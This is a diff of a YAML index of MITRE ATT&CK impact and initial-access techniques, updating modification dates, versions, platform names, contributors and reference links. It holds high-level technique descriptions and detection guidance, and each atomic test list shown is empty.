-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58137,6 +59032,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58149,16 +59048,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58226,11 +59161,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58248,7 +59182,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58275,7 +59209,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -58325,13 +59259,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -58399,11 +59332,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -58468,13 +59400,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58552,7 +59483,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -58602,11 +59532,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58645,10 +59574,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -58665,7 +59594,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -58704,12 +59633,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58771,7 +59699,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -58788,7 +59716,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -58818,7 +59745,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -58832,7 +59759,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -58895,12 +59821,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -58975,7 +59900,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -58989,19 +59914,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59027,7 +59951,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59082,7 +60006,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59145,11 +60068,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59164,6 +60086,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59172,18 +60095,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59215,14 +60138,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59233,6 +60153,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59241,22 +60166,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -59281,36 +60202,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -59339,9 +60243,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -59359,7 +60263,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -59397,11 +60305,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59418,7 +60325,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -59428,7 +60334,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59437,19 +60343,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59497,11 +60401,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59521,10 +60426,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
